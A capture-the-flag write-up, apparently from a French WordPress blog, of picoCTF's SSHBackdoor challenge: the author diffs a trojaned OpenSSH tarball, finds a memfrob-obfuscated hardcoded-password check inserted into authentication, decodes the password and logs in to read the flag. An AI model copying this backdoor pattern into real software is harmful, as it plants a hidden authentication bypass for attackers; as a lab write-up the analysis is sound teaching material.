PICOCTF | SSHBACKDOOR – 100 [WRITE UP]

PICOCTF : this CTF was organised by the PPP team that I don’t need to present, and it was really fun !
For this challenge, we had this explanations :

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in out network logs show is the attacker downloading this. Can you figure out a way to get back into my account?

The first thing I did was download the .tar.gz file, named openssh-6.7p1-evil.tar.gz.
After that, I have downloaded the real openssh-6.7 here !

And this is what I did :

$ for file in /tmp/openssh-6.7p1/* ; do diff $file $(basename $file) ; done

777,794d776
 <
 < static int frobcmp(const char *chk, const char *str) {
 < int rc = 0;
 < size_t len = strlen(str);
 < char *s = xstrdup(str);
 < memfrob(s, len);   # XOR with int 42 (cf -> http://linux.die.net/man/3/memfrob)
 <
 < if (strcmp(chk, s) == 0) {
 < rc = 1;
 < }
 <
 < free(s);
 < return rc;
 < }
 <
 < int check_password(const char *password) {
 < return frobcmp("CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY", password);
 < }
 214,215d213
 < int check_password(const char *);
 <
 115,117d114
 < if (check_password(password)) {
 < return ok;
 < }

As I said in comments, the function memfrob is simply an XOR with the integer 42.
So, when the function frobcmp is called, the memfrob is called inside it, then XOR the string « CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY » with 42, then compare with the password I typed.

So, let’s (un)XOR this string :

>>> a
'CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY'
>>> b
42
>>> "".join(chr(ord(key) ^ ord(pad)) for key, pad in zip(a, cycle(chr(b))))
'iminyourmachinestealingyourflags'

Well, let’s try with this string that I thought was the good password :

$ ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com's password:
Last login: Mon Oct 27 23:27:15 2014 from pool-72-66-25-232.washdc.fios.verizon.net
jon@ip-10-45-162-116:~$

Huray, it works \o/
The last step was to find the flag, and display it ; )

jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor

And voila, powned !

Publicités

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s